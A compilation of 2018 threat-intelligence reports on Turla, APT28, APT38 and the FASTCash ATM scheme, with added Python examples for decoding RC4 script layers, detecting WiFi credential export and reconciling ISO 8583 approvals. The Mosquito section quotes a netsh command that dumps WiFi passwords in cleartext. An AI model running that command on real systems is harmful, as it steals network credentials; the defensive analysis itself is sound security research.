IcedCoffee is a fairly basic backdoor that uses WMI to collect a variety of system and user information, which is then base64-encoded, RC4-encrypted and submitted via HTTP POST to the C2 server. IcedCoffee has no built-in command capability; instead it may receive Javascript files from the C2 server, which are deobfuscated and executed in memory, leaving nothing behind on disk for forensic analysis. IcedCoffee was not widely deployed; rather, it was targeted at diplomats, including ambassadors, of European governments.

In November 2016, Kaspersky Lab observed a new round of weaponized macro documents that dropped a new, heavily obfuscated Javascript payload that we named KopiLuwak (one of the rarest and most expensive types of coffee in the world). The targeting for this new malware was consistent with earlier Turla operations, focusing on European governments, but it was even more selectively deployed than IcedCoffee.

The KopiLuwak script is decoded by macro code very similar to that previously seen with IcedCoffee, but the resulting script is not the final step. This script is executed with a parameter used as a key to RC4 decrypt an additional layer of javascript that contains the system information collection and command and control beaconing functionality. KopiLuwak performs a more comprehensive system and network reconnaissance collection, and like IcedCoffee leaves very little on disk for investigators to discover other than the base script.

Unlike IcedCoffee, KopiLuwak contains a basic set of command functionality, including the ability to run arbitrary system commands and uninstall itself. In mid-2017 a new version was discovered in which this command set had been further enhanced to include file download and data exfiltration capabilities.
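Both mechanisms described above come down to RC4 over a base64 wrapper: the IcedCoffee beacon is base64-encoded and then RC4-encrypted before the HTTP POST, and the KopiLuwak second layer is RC4-decrypted with a key passed to the outer script as a parameter. The helper below is an added analyst-side example, not Kaspersky's or Turla's code, for peeling such a layer once the key has been recovered from the launcher. The key, inner script and beacon body are constructed samples, and the KopiLuwak layer order (inner script, then RC4, then base64) is an assumption the report does not state.

```python
"""Peel a base64/RC4 script layer or beacon (added example, constructed data)."""
import base64


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Symmetric: the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def peel_script_layer(blob_b64: str, key: str) -> str:
    """KopiLuwak-style layer: the outer script carries an RC4-encrypted inner
    script and receives the key at run time. Assumed order: inner script ->
    RC4 -> base64, so undo base64 first, then RC4. A wrong key yields garbage
    rather than an exception."""
    return rc4(key.encode(), base64.b64decode(blob_b64)).decode("utf-8", errors="replace")


def decode_beacon(body: bytes, key: str) -> str:
    """IcedCoffee-style beacon: collected data is base64-encoded, then
    RC4-encrypted, then POSTed. Undo in reverse: RC4 first, then base64."""
    return base64.b64decode(rc4(key.encode(), body)).decode("utf-8")


def wrap_script_layer(inner_script: str, key: str) -> str:
    """Inverse of peel_script_layer; used only to build the constructed sample."""
    return base64.b64encode(rc4(key.encode(), inner_script.encode())).decode()


def encode_beacon(plaintext: str, key: str) -> bytes:
    """Inverse of decode_beacon; used only to build the constructed sample."""
    return rc4(key.encode(), base64.b64encode(plaintext.encode()))


# Constructed sample, not a real KopiLuwak or IcedCoffee artefact.
SAMPLE_KEY = "example-key"
SAMPLE_INNER = 'var c2 = "http://example.invalid/"; WScript.Echo("stage 2");'
SAMPLE_BLOB = wrap_script_layer(SAMPLE_INNER, SAMPLE_KEY)

if __name__ == "__main__":
    print(peel_script_layer(SAMPLE_BLOB, SAMPLE_KEY))
    print(decode_beacon(encode_beacon("host=WS01;user=alice", SAMPLE_KEY), SAMPLE_KEY))
```

In practice the key is whatever argument the macro or .lnk launcher passes to the outer script, so the launcher, not the script body, is where to look first during triage.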

The most recent evolution in the KopiLuwak life cycle was observed in mid-2018, when we observed a very small set of systems in Syria and Afghanistan being targeted with a new delivery vector. In this campaign the KopiLuwak backdoor was encoded and delivered in a Windows shortcut (.lnk) file. The .lnk files were an especially interesting development because the powershell code they contain for decoding and dropping the payload is nearly identical to that utilized by the Zebrocy threat actor a month earlier.

Carbon – the long tail
Carbon continues to be deployed against government and foreign affairs related organizations in Central Asia. Carbon targeting in this region has shifted across a few countries since 2014. Here, we find a new orchestrator v3.8.2 and a new injected transport library v4.0.8 deployed to multiple systems. And while we cannot identify a concrete delivery event for the dropper, its appearance coincides with the presence of meterpreter. This meterpreter reliance also coincides with wider Turla use of open source tools that we documented towards the end of 2017 and beginning of 2018.

The Epic Turla operation reported in 2014 involved highly selective Carbon delivery and was a long term global operation that affected hundreds of victims. Only a small portion of these systems were upgraded to a malware set known as “the Carbon framework”, and even fewer received the Snake rootkit for “extreme persistence”. So, Carbon is known to be a sophisticated codebase with a long history and very selective delivery, and coincides with Snake rootkit development and deployment. In light of its age, it’s interesting that this codebase is currently being modified, with additional variants deployed to targets in 2018.

We expect Carbon framework code modifications and predict selective deployment of this matured codebase to continue into 2019 within Central Asia and related remote locations. A complex module like this one must require some effort and investment, and while corresponding loader/injector and lateral movement malware moves to open source, this backdoor package and its infrastructure is likely not going to be replaced altogether in the short term.

.JS attachments deliver Skipper/WhiteAtlas and WhiteBear
We introduced WhiteBear actionable data to our private customers in early 2017, and analysis similar to that report was publicly shared eight months later. Again, it was a cluster of activity that continued to grow past expectations. It is interesting because WhiteBear shared known compromised infrastructure with KopiLuwak: soligro[.]com. WhiteBear scripted spearphish attachments also follow up on initial WhiteAtlas scripting development and deployment efforts.

Mosquito’s Changing 2018 Delivery Techniques
In March 2018, our private report customers received actionable data on Mosquito’s inclusion of fileless and customized Posh-SecMod metasploit components. When discussion of the group’s metasploit use was made public, their tactics began to change.

The “DllForUserFileLessInstaller” injector module maintained a compilation date of November 22, 2017, and was starting to be used by Mosquito to inject ComRAT modules into memory around January 2018. It is a small piece of metasploit injector code that accounts for issues with Wow64. Also, related open source powershell registry loader code oddly was modified to avoid AES use, and opt for 3DES encryption instead. Here is the modified Mosquito code:

And here is the default Posh-SecMod code that they ripped from:

We expect to see more open-source based or inspired fileless components and memory loaders from Mosquito throughout 2018. Perhaps this malware enhancement indicates that they are more interested in maintaining current access to victim organizations than developing offensive technologies.

MiTM and Ducking the Mosquito Net
We delivered actionable data on Mosquito to our private intel customers in early 2017. Our initial findings included data around an unusual and legitimate download URL for trojanized installers:


While we could not identify the MiTM techniques with accuracy at the time, it is possible either WiFi MiTM or router compromise was used in relation to these incidents. It is unlikely, but possible, that ISP-level FinFisher MiTM was used, considering multiple remote locations across the globe were targeted.

But there is more incident data that should be elaborated on. In some cases, two “.js” files were written to disk and the infected system configured to run them at startup. Their naming provides insight into the intention of this functionality, which is to keep the malware remotely updated via google application, and maintain local settings updates by loading and running “1.txt” at every startup. In a way, this staged script loading technique seems to be shared with the IcedCoffee javascript loading techniques observed in past Turla incidents focused on European government organizations. Updates are provided from the server-side, leading to fewer malware set findings.

So, we should consider the wifi data collection that Mosquito Turla performed during these updates, as it hasn't been documented publicly. One of the first steps that several Mosquito installer packages performed after writing and running this local_update js file was to export all of the local host's WiFi profiles (settings and passwords) to %APPDATA%\<profile>.xml with a command line call:

cmd.exe /c netsh wlan export profile key=clear folder="%APPDATA%"

They then gather more network information with calls to ipconfig and arp -a. Maintaining ongoing host-based collection of wifi credentials for target networks makes it far easier to retain access to wifi networks for spoofing and MiTM, as brute-forcing or otherwise cracking weakly secured WiFi networks becomes unnecessary. Perhaps this particular method of location-dependent intrusion and access is on the decline for Mosquito Turla, as we haven't identified new URLs delivering trojanized code.
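The netsh export with key=clear followed shortly by ipconfig and arp -a is a compact behavioural signature for this installer stage. The detection below is an added example, not Kaspersky's tooling, run over constructed process-creation events in a Sysmon-like shape (timestamp, host, parent image, image, command line). The wscript.exe -> cmd.exe -> netsh.exe parent chain in the sample is an assumption; the page only shows the cmd.exe /c invocation that followed running the dropped .js file.

```python
"""Flag a cleartext WiFi profile export followed by host network recon
(added detection example over constructed events, not real telemetry)."""
import re
from datetime import datetime, timedelta

# "netsh wlan export profile key=clear ..." is the command quoted on the page.
WIFI_EXPORT = re.compile(r"\bwlan\s+export\s+profile\b.*\bkey=clear\b", re.IGNORECASE)
RECON_IMAGES = {"ipconfig.exe", "arp.exe"}  # ipconfig and arp -a, per the page


def image_name(image):
    """Basename of a Windows image path, lower-cased."""
    return image.rsplit("\\", 1)[-1].lower()


def detect(events, window=timedelta(seconds=120)):
    """events: iterable of (iso_timestamp, host, parent_image, image, command_line).
    One finding per netsh.exe export with cleartext keys; escalated to a second
    rule name when ipconfig/arp run on the same host within `window` afterwards."""
    events = list(events)
    findings = []
    for ts, host, parent, image, cmd in events:
        if image_name(image) != "netsh.exe" or not WIFI_EXPORT.search(cmd):
            continue
        t0 = datetime.fromisoformat(ts)
        recon = sorted({
            image_name(e[3]) for e in events
            if e[1] == host and image_name(e[3]) in RECON_IMAGES
            and t0 <= datetime.fromisoformat(e[0]) <= t0 + window
        })
        findings.append({
            "host": host,
            "time": ts,
            "parent": image_name(parent),
            "rule": ("wifi_profile_export_with_recon" if recon
                     else "wifi_profile_export_cleartext_keys"),
            "recon": recon,
            "command_line": cmd,
        })
    return findings


# Constructed events. The script-host ancestor is an assumption (see lead-in).
SAMPLE_EVENTS = [
    ("2018-03-01T09:00:01", "WS01", "wscript.exe", "cmd.exe",
     r'cmd.exe /c netsh wlan export profile key=clear folder="%APPDATA%"'),
    ("2018-03-01T09:00:01", "WS01", "cmd.exe", r"C:\Windows\System32\netsh.exe",
     r'netsh wlan export profile key=clear folder="C:\Users\u\AppData\Roaming"'),
    ("2018-03-01T09:00:03", "WS01", "cmd.exe", "ipconfig.exe", "ipconfig /all"),
    ("2018-03-01T09:00:04", "WS01", "cmd.exe", "ARP.EXE", "arp -a"),
    # Benign: an admin exporting one profile without the key, on another host.
    ("2018-03-01T14:10:00", "WS02", "explorer.exe", "netsh.exe",
     r'netsh wlan export profile name="Corp" folder="C:\temp"'),
    # Benign: recon-looking command with no preceding export on that host.
    ("2018-03-01T15:00:00", "WS03", "cmd.exe", "ARP.EXE", "arp -a"),
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding["rule"], finding["host"], finding["parent"], finding["recon"])
```

Matching on the netsh.exe process rather than on every command line that contains the string avoids double-counting the cmd.exe /c wrapper, while still recording its parent so the script-host ancestor can be pivoted on.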

The Next Strike
It’s very interesting to see ongoing targeting overlap, or the lack of overlap, with other APT activity. Noting that Turla was absent from the milestone DNC hack event where Sofacy and CozyDuke were both present, but Turla was quietly active around the globe on other projects, provides some insight as to ongoing motivations and ambitions of this group. It is interesting that data related to these organizations has not been weaponized and found online while this Turla activity quietly carries on.

Both Turla’s Mosquito and Carbon projects focus mainly on diplomatic and foreign affairs targets. While WhiteAtlas and WhiteBear activity stretched across the globe to include foreign affairs related organizations, not all targeting consistently followed this profile. Scientific and technical centers were also targeted, and organizations outside of the political arena came under focus as well. Turla’s KopiLuwak activity does not necessarily focus on diplomatic/foreign affairs, and also winds down a different path. Instead, 2018 activity targeted government related scientific and energy research organizations, and a government related communications organization in Afghanistan. This highly selective but wider targeting set most likely will continue into 2019.
From the targeting perspective, we see closer ties between the KopiLuwak and WhiteBear activity, and closer alignments between Mosquito and Carbon activity.

And WhiteBear and KopiLuwak shared infrastructure while deploying unusual .js scripting. Perhaps open source offensive malware will become much more present in Mosquito and Carbon attacks as we see more meterpreter and injector code, and more uniquely innovative complex malware will continue to be distributed with KopiLuwak and a possible return of WhiteBear. And as we see with the techniques borrowed from previous Zebrocy spearphishing, techniques are sometimes passed around and duplicated.

APT28 group return to covert intelligence gathering ops in Europe and South America.
8.10.2018 securityaffairs

Experts from Symantec collected evidence that APT28 group returns to covert intelligence gathering operations in Europe and South America.
The state-sponsored APT28 group (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM) seems to have shifted the focus of its operations away from election interference and back to cyber espionage.

The APT28 group has been active since at least 2007 and has targeted governments, militaries, and security organizations worldwide. The group was also involved in the string of attacks that targeted the 2016 US Presidential election.

According to Symantec, starting in 2017 and continuing into 2018 the group returned to covert intelligence gathering operations, actively conducting cyber espionage campaigns against government and military organizations in Europe and South America.

“After receiving an unprecedented amount of attention in 2016, APT28 has continued to mount operations during 2017 and 2018. However, the group’s activities since the beginning of 2017 have again become more covert and appear to be mainly motivated by intelligence gathering.” reads the analysis published by Symantec.

“The organizations targeted by APT28 during 2017 and 2018 include:

A well-known international organization
Military targets in Europe
Governments in Europe
A government of a South American country
An embassy belonging to an Eastern European country”

The cyberespionage group used several malware and hacking tools from its arsenal, including the Sofacy malware, which is composed of two main components: Trojan.Sofacy (aka Seduploader), used for basic reconnaissance, and Backdoor.SofacyX (aka X-Agent), used as a second-stage information-stealing backdoor.

The group is also using the recently discovered LoJax UEFI rootkit, which allows the attackers to maintain persistence on an infected machine even if the operating system is reinstalled or the hard drive is replaced.

Symantec researchers also highlighted possible links to other espionage operations, including the Earworm group, which has been active since at least May 2016 and is involved in intelligence-gathering operations against military targets in Europe, Central Asia, and Eastern Asia.

The Earworm group carried out spear-phishing campaigns aimed at delivering the Trojan.Zekapab downloader and the Backdoor.Zekapab.

Experts noticed some overlap with the command and control infrastructures used by Earworm and APT28.

“During 2016, Symantec observed some overlap between the command and control (C&C) infrastructure used by Earworm and the C&C infrastructure used by Grizzly Steppe (the U.S. government code name for APT28 and related actors), implying a potential connection between Earworm and APT28. However, Earworm also appears to conduct separate operations from APT28 and thus Symantec tracks them as a distinct group.” continues the report.

The information gathered by Symantec demonstrates that APT28 is still very active and continues to change its tactics, techniques, and procedures (TTPs) to remain under the radar.

North Korean Attacks on Banks Attributed to 'APT38' Group
5.10.2018 securityweek

A report published on Wednesday by FireEye details the activities of a financially motivated threat actor believed to be operating on behalf of the North Korean government.

The group, tracked by FireEye as APT38, focuses on targeting financial institutions, and the company’s researchers estimate that it has stolen at least a hundred million dollars from banks worldwide. It’s believed that the group has attempted to steal over $1.1 billion.

Much of the North Korea-linked cyber activity has been attributed to the notorious Lazarus, but cybersecurity firms have begun to realize that, similar to other countries, there are actually several groups that appear to be launching attacks on behalf of the government. The fact that their tools, techniques and infrastructure often overlap makes it difficult to accurately attribute an operation to a certain group.

FireEye noted that there are many similarities between APT38 and attacks launched by other North Korea-linked groups, including Lazarus and the activity it tracks as TEMP.Hermit. However, it believes APT38’s tools and its tactics, techniques and procedures (TTPs) are distinct enough for it to be tracked separately.

Some other security firms have also noticed that the financially motivated attacks linked to Lazarus may have actually been carried out by a subgroup of Lazarus. Kaspersky has tracked this subgroup as Bluenoroff, while CrowdStrike has dubbed it Stardust Chollima. CrowdStrike has been tracking a total of four subgroups, which it has named Stardust Chollima, Silent Chollima, Labyrinth Chollima and Ricochet Chollima.

According to FireEye, APT38 has been active since at least 2014 and it has been observed targeting over 16 organizations across 11 countries – researchers believe the actual number of targets may be higher.


Several of these attacks made headlines in the past years and the researchers who analyzed them reported seeing significant similarities to Lazarus campaigns. However, FireEye says the attacks were actually carried out by APT38. The attacks, many of which targeted the SWIFT banking system, were aimed, among others, at Vietnam’s TP Bank in 2015, Bangladesh’s central bank in 2016, Taiwan’s Far Eastern International in 2017, Bancomext in Mexico in 2018, and Banco de Chile also in 2018.

“Attribution to both the ‘Lazarus’ group and TEMP.Hermit was made with varying levels of confidence primarily based on similarities in malware being leveraged in identified operations,” FireEye said in its report on APT38. “Over time these malware similarities diverged, as did targeting, intended outcomes, and TTPs, almost certainly indicating that TEMP.Hermit activity is made up of multiple operational groups primarily linked together with shared malware development resources and North Korean state sponsorship.”

FireEye believes that several other attacks that made the news – involving banks in Africa, Vietnam, Malaysia, the Philippines, Ecuador, and India – may have also been carried out by APT38 based on timing, location, malware, general TTPs and the fact that they targeted SWIFT systems.

Unlike other North Korean threat groups, APT38’s attacks are almost exclusively cyber heists whose likely goal is to raise money for the regime. On the other hand, unlike typical cybercrime operations, APT38’s campaigns are more similar to espionage.

“APT38 executes sophisticated bank heists typically featuring long planning, extended periods of access to compromised victim environments preceding any attempts to steal money, fluency across mixed operating system environments, the use of custom developed tools, and a constant effort to thwart investigations capped with a willingness to completely destroy compromised machines afterwards,” FireEye said.

Experts believe APT38 was created by North Korea as a result of the sanctions imposed on the country. The group was first spotted in February 2014, roughly one year after the UN blocked the regime from making bulk cash transfers and restricted its ties to international banking systems. As more and more sanctions were imposed on North Korea in the following years, APT38 escalated its activities and the frequency of its attacks increased.

FireEye has warned that APT38 continues to be active, even after the United States named and charged an alleged North Korean hacker who is said to have been involved in the development of Lazarus tools.

Hidden Cobra APT used the new ATM cash-out scheme FASTCash to hit banks worldwide
4.10.2018 securityaffairs

The US-CERT has released a joint technical alert from the DHS, the FBI, and the Treasury warning about a new ATM cash-out scheme, dubbed "FASTCash," being used by the prolific North Korean APT group known as Hidden Cobra (aka Lazarus Group and Guardians of Peace).

The activity of the Lazarus Group surged in 2014 and 2015; its members mostly used custom-tailored malware in their attacks, and the experts who investigated the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems.

The group is considered responsible for the massive WannaCry ransomware attack, a string of SWIFT attacks in 2016, and the Sony Pictures hack.

According to the report published by the US-CERT, Hidden Cobra has been using the FASTCash technique since at least 2016, the APT group targets bank infrastructure to cash out ATMs.

Government experts analyzed 10 samples of malware involved in FASTCash attacks, state-sponsored hackers used them to compromise payment “switch application servers” within the targeted banks to facilitate fraudulent transactions.

“FASTCash schemes remotely compromise payment switch application servers within banks to facilitate fraudulent transactions. The U.S. Government assesses that HIDDEN COBRA actors will continue to use FASTCash tactics to target retail payment systems vulnerable to remote exploitation.” states the report.

“According to a trusted partner’s estimation, HIDDEN COBRA actors have stolen tens of millions of dollars. In one incident in 2017, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs located in over 30 different countries. In another incident in 2018, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs in 23 different countries.”

A switch application server communicates with the core banking system to validate a user's bank account details for a requested transaction.

HIDDEN COBRA attackers deployed legitimate scripts on compromised switch application servers to intercept financial request messages and reply to them with fraudulent but legitimate-looking affirmative response messages.

Experts noticed that all of the compromised switch application servers were running unsupported IBM Advanced Interactive eXecutive (AIX) operating system versions.

At the time of the alert, the initial infection vector was still unknown; in any case, there is no evidence that the attackers exploited the AIX operating system itself in these incidents.

“HIDDEN COBRA actors exploited the targeted systems by using their knowledge of International Standards Organization (ISO) 8583—the standard for financial transaction messaging—and other tactics.” continues the report.

“HIDDEN COBRA actors most likely deployed ISO 8583 libraries on the targeted switch application servers. Malicious threat actors use these libraries to help interpret financial request messages and properly construct fraudulent financial response messages.”


Most accounts used to initiate the transactions had minimal activity or zero balances.

The FASTCash cash-out scheme was used to target banks in Africa and Asia, while U.S. authorities are still investigating incidents in the country that may be linked to this technique.
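To make the switch-side manipulation concrete: an ISO 8583 message is a four-digit message type indicator (MTI), a 64-bit bitmap saying which data elements follow, and the elements themselves. The example below is added here and is not taken from the alert or from any bank software. It parses that layout for a small subset of fields (ASCII encoding and primary bitmap only, which is an assumption; real switches also use binary encodings and secondary bitmaps) and then performs the reconciliation a defender would want given the zero-balance detail above: every approval the switch emitted (MTI 0210, response code 00) is matched to the request it saw and to the balance the core banking system holds. An approval with no matching request, an unknown account, or a balance below the amount is exactly what a switch answering requests on its own would produce. Account numbers, trace numbers and balances are constructed.

```python
"""Minimal ISO 8583 parsing plus a switch-vs-core reconciliation check
(added example; field subset, ASCII encoding and sample data are assumptions)."""

# Simplified subset of ISO 8583 data elements: field -> (encoding, length).
# 'fixed' is an exact length; 'LLVAR' has a two-digit length prefix up to a max.
FIELDS = {
    2:  ("LLVAR", 19),  # Primary account number (PAN)
    3:  ("fixed", 6),   # Processing code
    4:  ("fixed", 12),  # Amount, transaction (minor units)
    7:  ("fixed", 10),  # Transmission date and time, MMDDhhmmss
    11: ("fixed", 6),   # System trace audit number (STAN)
    39: ("fixed", 2),   # Response code ("00" = approved)
    41: ("fixed", 8),   # Card acceptor terminal identification
}


def bitmap_to_fields(bitmap_hex):
    """Bit 1 of the 64-bit bitmap is the most significant bit."""
    bits = int(bitmap_hex, 16)
    return [f for f in range(1, 65) if bits >> (64 - f) & 1]


def parse_iso8583(msg):
    """Parse an ASCII ISO 8583 message with a primary bitmap only."""
    mti, bitmap = msg[:4], msg[4:20]
    pos, fields = 20, {}
    for f in bitmap_to_fields(bitmap):
        if f == 1:
            raise ValueError("secondary bitmap not handled in this example")
        kind, length = FIELDS[f]            # KeyError: field outside the subset
        if kind == "LLVAR":
            n = int(msg[pos:pos + 2]); pos += 2
            if n > length:
                raise ValueError("LLVAR length exceeds field maximum")
        else:
            n = length
        fields[f] = msg[pos:pos + n]; pos += n
    if pos != len(msg):
        raise ValueError("trailing data after last field")
    return mti, fields


def build_iso8583(mti, fields):
    """Inverse of parse_iso8583; used here to construct the sample traffic."""
    bits, body = 0, ""
    for f in sorted(fields):
        kind, length = FIELDS[f]
        val = fields[f]
        if kind == "LLVAR":
            if len(val) > length:
                raise ValueError("value too long for LLVAR field")
            body += f"{len(val):02d}{val}"
        else:
            if len(val) != length:
                raise ValueError("wrong length for fixed field")
            body += val
        bits |= 1 << (64 - f)
    return f"{mti}{bits:016X}{body}"


def suspicious_approvals(requests, responses, core_balances):
    """Reconcile switch-emitted approvals against the core system's view.
    Returns (STAN, reason) for approvals the core could not have authorized."""
    by_stan = {}
    for raw in requests:
        mti, f = parse_iso8583(raw)
        if mti == "0200":
            by_stan[f[11]] = f
    flagged = []
    for raw in responses:
        mti, f = parse_iso8583(raw)
        if mti != "0210" or f.get(39) != "00":
            continue
        req = by_stan.get(f.get(11))
        if req is None:
            flagged.append((f.get(11), "approval without a matching request"))
            continue
        amount, balance = int(req[4]), core_balances.get(req[2])
        if balance is None:
            flagged.append((f[11], "approval for an account unknown to the core"))
        elif balance < amount:
            flagged.append((f[11], f"approved {amount} against balance {balance}"))
    return flagged


# Constructed sample: requests entering the switch, responses it emitted, and
# the core system's balances in minor units. Not real bank data.
CORE_BALANCES = {"4111111111111111": 0, "5500000000000004": 250000}
REQUESTS = [
    build_iso8583("0200", {2: "4111111111111111", 3: "010000", 4: "000000050000",
                           7: "1004120000", 11: "000123", 41: "ATM00001"}),
    build_iso8583("0200", {2: "5500000000000004", 3: "010000", 4: "000000010000",
                           7: "1004120005", 11: "000124", 41: "ATM00002"}),
]
RESPONSES = [
    build_iso8583("0210", {2: "4111111111111111", 4: "000000050000", 11: "000123",
                           39: "00", 41: "ATM00001"}),   # zero-balance account approved
    build_iso8583("0210", {2: "5500000000000004", 4: "000000010000", 11: "000124",
                           39: "00", 41: "ATM00002"}),   # legitimate approval
    build_iso8583("0210", {4: "000000090000", 11: "000999", 39: "00",
                           41: "ATM00003"}),             # approval the switch never asked about
]

if __name__ == "__main__":
    for stan, reason in suspicious_approvals(REQUESTS, RESPONSES, CORE_BALANCES):
        print(stan, reason)
```

The check only works if the log of approvals is collected somewhere the switch operator cannot edit, such as the ATM network or the card issuer's own logs, since a compromised switch can also suppress or rewrite what it records locally.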

Experts believe the threat actors gained initial access to the banks through spear-phishing messages carrying Windows executables.

The malicious code was then used for lateral movement aimed at deploying malware onto the payment switch application server.

US-CERT provided mitigation recommendations for institutions with retail payment systems, including two-factor authentication for any access to the switch application server.

Further details, including IoCs, are reported in the alert.

APT38 is behind financially motivated attacks carried out by North Korea
4.10.2018 securityaffairs

Security experts from FireEye published a report on the activity of financially motivated threat actors, tracked as APT38, linked to the North Korean government.
The attacks aimed at financial institutions, FireEye estimates APT38 has stolen at least a hundred million dollars from banks worldwide.

APT38 appears to be a North Korea-linked group separate from the infamous Lazarus group; it has been active since at least 2014 and has been observed targeting over 16 organizations across 11 countries.

The report attributes the string of attacks against the SWIFT banking system to APT38, including the hacks of Vietnam's TP Bank in 2015, Bangladesh's central bank in 2016, Taiwan's Far Eastern International in 2017, Bancomext in Mexico in 2018, and Banco de Chile in 2018.

“APT38 is a financially motivated group linked to North Korean cyber espionage operators, renowned for attempting to steal hundreds of millions of dollars from financial institutions and their brazen use of destructive malware.” reads the report published by FireEye.

“Attribution to both the “Lazarus” group and TEMP.Hermit was made with varying levels of confidence primarily based on similarities in malware being leveraged in identified operations. Over time these malware similarities diverged, as did targeting, intended outcomes, and TTPs, almost certainly indicating that TEMP.Hermit activity is made up of multiple operational groups primarily linked together with shared malware development resources and North Korean state sponsorship.”

According to FireEye, APT38 was targeting banks worldwide to allow the North Korean government to obtain cash while bypassing the sanctions imposed on Pyongyang by foreign states.

“Based on observed activity, we judge that APT38’s primary mission is targeting financial institutions and manipulating inter-bank financial systems to raise large sums of money for the North Korean regime. Increasingly heavy and pointed international sanctions have been levied on North Korea following the regime’s continued weapons development and testing.” continues the report.

“The pace of APT38 activity probably reflects increasingly desperate efforts to steal funds to pursue state interests, despite growing economic pressure on Pyongyang.”

Experts believe the activity of the group will continue in the future, likely adopting new sophisticated tactics to avoid detection.

“Based on the large scale of resources and vast network dedicated to compromising targets and stealing funds over the last few years, we believe APT38’s operations will continue in the future,” concludes FireEye.

“In particular, the number of SWIFT heists that have been ultimately thwarted in recent years coupled with growing awareness for security around the financial messaging system could drive APT38 to employ new tactics to obtain funds especially if North Korea’s access to currency continues to deteriorate.”

NKorea Said to Have Stolen a Fortune in Online Bank Heists
4.10.2018 securityweek

North Korea’s nuclear and missile tests have stopped, but its hacking operations to gather intelligence and raise funds for the sanction-strapped government in Pyongyang may be gathering steam.

U.S. security firm FireEye raised the alarm Wednesday over a North Korean group that it says has stolen hundreds of millions of dollars by infiltrating the computer systems of banks around the world since 2014 through highly sophisticated and destructive attacks that have spanned at least 11 countries. It says the group is still operating and poses “an active global threat.”

It is part of a wider pattern of malicious state-backed cyber activity that has led the Trump administration to identify North Korea — along with Russia, Iran and China — as one of the main online threats facing the United States. Last month, the Justice Department charged a North Korean hacker said to have conspired in devastating cyberattacks, including an $81 million heist of Bangladesh’s central bank and the WannaCry virus that crippled parts of Britain’s National Health Service.

On Tuesday, the U.S. Department of Homeland Security warned of the use of malware by Hidden Cobra, the U.S. government’s byword for North Korea hackers, in fraudulent ATM cash withdrawals from banks in Asia and Africa. It said that Hidden Cobra was behind the theft of tens of millions of dollars from teller machines in the past two years. In one incident this year, cash had been simultaneously withdrawn from ATMs in 23 different countries, it said.

North Korea, which prohibits access to the world wide web for virtually all its people, has previously denied involvement in cyberattacks, and attribution for such attacks is rarely made with absolute certainty. It is typically based on technical indicators such as the Internet Protocol addresses that identify computers and characteristics of the coding used in malware, which is the software a hacker may use to damage or disable computers.

But other cybersecurity experts tell The Associated Press that they also see continued signs that North Korea’s authoritarian government, which has a long track record of criminality to raise cash, is conducting malign activity online. That activity includes targeting of financial institutions and crypto-currency-related organizations, as well as spying on its adversaries, despite the easing of tensions between Pyongyang and Washington.

“The reality is they are starved for cash and are continuing to try and generate revenue, at least until sanctions are diminished,” said Adam Meyers, vice president of intelligence at CrowdStrike. “At the same time, they won’t abate in intelligence collection operations, as they continue to negotiate and test the international community’s resolve and test what the boundaries are.”

CrowdStrike says it has detected continuing North Korean cyber intrusions in the past two months, including the use of a known malware against a potentially broad set of targets in South Korea, and a new variant of malware against users of mobile devices that use a Linux-based operating system.

This activity has been taking place against the backdrop of a dramatic diplomatic shift as Kim Jong Un has opened up to the world. He has held summits with South Korean President Moon Jae-in and with President Donald Trump, who hopes to persuade Kim to relinquish the nuclear weapons that pose a potential threat to the U.S. homeland. Tensions on the divided Korean Peninsula have dropped and fears of war with the U.S. have ebbed. Trump this weekend will dispatch his top diplomat, Mike Pompeo, to Pyongyang for the fourth time this year to make progress on denuclearization.

But North Korea has yet to take concrete steps to give up its nuclear arsenal, so there’s been no let-up in sanctions that have been imposed to deprive it of fuel and revenue for its weapons programs, and to block it from bulk cash transfers and from accessing the international banking system.

FireEye says APT38, the name it gives to the hacking group dedicated to bank theft, has emerged and stepped up its operations since February 2014 as the economic vise on North Korea has tightened in response to its nuclear and missile tests. Initial operations targeted financial institutions in Southeast Asia, where North Korea had experience in money laundering, but then expanded into other regions such as Latin America and Africa, and then extended to Europe and North America.

In all, FireEye says APT38 has attempted to steal $1.1 billion, and based on the data it can confirm, has gotten away with hundreds of millions of dollars. It has used malware to insert fraudulent transactions in the Society for Worldwide Interbank Financial Telecommunication or SWIFT system that is used to transfer money between banks. Its biggest heist to date was $81 million stolen from the central bank of Bangladesh in February 2016. The funds were wired to bank accounts established with fake identities in the Philippines. After the funds were withdrawn they were suspected to have been laundered in casinos.

The Foundation for Defense of Democracies, a Washington think tank, said in a report Wednesday that North Korea’s cyber capabilities provide an alternative means for challenging its adversaries. While Kim’s hereditary regime appears to prioritize currency generation, attacks using the SWIFT system raise concerns that North Korean hackers “may become more proficient at manipulating the data and systems that undergird the global financial system,” it says.

Sandra Joyce, FireEye’s head of global intelligence, said that while APT38 is a criminal operation, it leverages the skills and technology of a state-backed espionage campaign, allowing it to infiltrate multiple banks at once and figure how to extract funds. On average, it dwells in a bank’s computer network for 155 days to learn about its systems before it tries to steal anything. And when it finally pounces, it uses aggressive malware to wreak havoc and cover its tracks.

“We see this as a consistent effort, before, during and after any diplomatic efforts by the United States and the international community,” said Joyce, describing North Korea as being “undeterred” and urging the U.S. government to provide more specific threat information to financial institutions about APT38′s modus operandi. APT stands for Advanced Persistent Threat.

The Silicon Valley-based company says it is aware of continuing, suspected APT38 operations against other banks. The most recent attack it is publicly attributing to APT38 was against one of Chile’s biggest commercial banks, Banco de Chile, in May this year. The bank has said a hacking operation robbed it of $10 million.

